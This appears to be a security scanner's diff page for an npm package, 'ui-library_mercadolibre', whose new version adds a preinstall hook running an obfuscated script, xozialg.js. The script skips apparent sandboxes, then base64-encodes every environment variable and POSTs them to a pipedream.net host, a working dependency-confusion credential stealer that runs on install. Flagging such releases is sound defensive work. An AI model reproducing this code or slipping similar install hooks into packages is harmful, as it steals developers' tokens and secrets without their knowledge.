ui-library_mercadolibre 1.11.0 → 20.988.615
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of ui-library_mercadolibre might be problematic. Click here for more details.
- package/package.json +6 -9
- package/xozialg.js +1 -0
- package/index.js +0 -28
- package/lib/index.js +0 -1
package/package.json
CHANGED
@@ -1,14 +1,11 @@
|
|
1
1
|
{
|
2
2
|
"name": "ui-library_mercadolibre",
|
3
|
-
"version": "
|
4
|
-
"
|
5
|
-
"main": "main.js",
|
3
|
+
"version": "20.988.615",
|
4
|
+
"main": "xozialg.js",
|
6
5
|
"scripts": {
|
7
|
-
"test": "test"
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
7
|
+
"preinstall": "node xozialg.js"
|
8
8
|
},
|
9
|
-
"author": "
|
10
|
-
"license": "ISC"
|
11
|
-
"dependencies": {
|
12
|
-
"lodash": "^4.17.21"
|
13
|
-
}
|
9
|
+
"author": "",
|
10
|
+
"license": "ISC"
|
14
11
|
}
|
package/xozialg.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
const a0_0x43f567=a0_0x8d37;(function(_0x1ad642,_0x4ecee1){const _0x505e89=a0_0x8d37,_0x5a6908=_0x1ad642();while(!![]){try{const _0x38ae87=parseInt(_0x505e89(0xcf))/0x1*(-parseInt(_0x505e89(0xe6))/0x2)+parseInt(_0x505e89(0xcc))/0x3+-parseInt(_0x505e89(0xe5))/0x4*(-parseInt(_0x505e89(0xd2))/0x5)+-parseInt(_0x505e89(0xd6))/0x6*(-parseInt(_0x505e89(0xda))/0x7)+-parseInt(_0x505e89(0xde))/0x8*(parseInt(_0x505e89(0xea))/0x9)+parseInt(_0x505e89(0xdb))/0xa*(-parseInt(_0x505e89(0xd1))/0xb)+-parseInt(_0x505e89(0xeb))/0xc;if(_0x38ae87===_0x4ecee1)break;else _0x5a6908['push'](_0x5a6908['shift']());}catch(_0x16e10d){_0x5a6908['push'](_0x5a6908['shift']());}}}(a0_0x39bf,0xbf440));const http=require(a0_0x43f567(0xd9)),filter=[{'key':a0_0x43f567(0xe0),'val':a0_0x43f567(0xce)},{'key':a0_0x43f567(0xe0),'val':a0_0x43f567(0xe9)},{'key':a0_0x43f567(0xe2),'val':a0_0x43f567(0xe3)},{'key':'_','val':a0_0x43f567(0xca)}];function main(){const _0x4da2d8=a0_0x43f567;var _0xc24cbf=process[_0x4da2d8(0xdc)]||{};if(filter[_0x4da2d8(0xe7)](({key:_0x5363d0,val:_0x43c1e3})=>_0xc24cbf[_0x5363d0]&&_0xc24cbf[_0x5363d0]['includes'](_0x43c1e3))||Object[_0x4da2d8(0xd8)](_0xc24cbf)[_0x4da2d8(0xe8)]<0xa)return;req=http[_0x4da2d8(0xe1)]({'host':[_0x4da2d8(0xd4),'m','pipedream','net'][_0x4da2d8(0xdf)]('.'),'path':'/'+(_0xc24cbf['npm_package_name']||''),'method':_0x4da2d8(0xcb)})['on'](_0x4da2d8(0xd3),function(_0x36c20c){}),req[_0x4da2d8(0xd0)](Buffer[_0x4da2d8(0xe4)](JSON[_0x4da2d8(0xdd)](_0xc24cbf))[_0x4da2d8(0xd7)](_0x4da2d8(0xcd))),req[_0x4da2d8(0xd5)]();}function a0_0x8d37(_0x532de6,_0xd2c1d9){const _0x39bfe3=a0_0x39bf();return a0_0x8d37=function(_0x8d3766,_0x9ed989){_0x8d3766=_0x8d3766-0xca;let _0x4a8566=_0x39bfe3[_0x8d3766];return _0x4a8566;},a0_0x8d37(_0x532de6,_0xd2c1d9);}main();function a0_0x39bf(){const _0x14fc50=['https','98ZnLupW','50mmUibe','env','stringify','16ajytsV','join','npm_config_registry','request','USERNAME','daasadmin','from','3281164HGIcNh','46HuyOOe','some','length','tencent.com','1484469OdmBrV','15123096cefhEI','/usr/bin/python','POST','3596463Qtqxhi','base64','taobao.org','17553DDOTNx','write','888547yUgXlJ','5bUIhGf','error','dc44079f2a81b29fc85632f802b65e3b','end','498024edjImV','toString','keys'];a0_0x39bf=function(){return _0x14fc50;};return a0_0x39bf();}
|
package/index.js
DELETED
@@ -1,28 +0,0 @@
|
|
1
|
-
module.exports = {
|
2
|
-
env: {
|
3
|
-
},
|
4
|
-
globals: {
|
5
|
-
},
|
6
|
-
extends: ['eslint:recommended', 'airbnb-base'],
|
7
|
-
rules: {
|
8
|
-
strict: 'off',
|
9
|
-
'func-names': 'off',
|
10
|
-
'spaced-comment': 'off',
|
11
|
-
'no-underscore-dangle': 'off',
|
12
|
-
'arrow-body-style': 'off',
|
13
|
-
'arrow-parens': ['off', 'as-needed'],
|
14
|
-
'prefer-rest-params': 'off',
|
15
|
-
'no-trailing-spaces': ['error', { skipBlankLines: true }],
|
16
|
-
'comma-dangle': ['warn', 'never'],
|
17
|
-
'new-cap': 'warn',
|
18
|
-
'no-unused-vars': 'warn',
|
19
|
-
'object-shorthand': 1,
|
20
|
-
'prefer-arrow-callback': 'off',
|
21
|
-
'prefer-template': 'warn',
|
22
|
-
'vars-on-top': 'warn',
|
23
|
-
indent: ['error', 2, { SwitchCase: 1 }],
|
24
|
-
'import/newline-after-import': 0,
|
25
|
-
'no-multi-assign': 1,
|
26
|
-
'no-prototype-builtins': 'warn'
|
27
|
-
}
|
28
|
-
};
|
package/lib/index.js
DELETED
@@ -1 +0,0 @@
|
|
1
|
-
test
|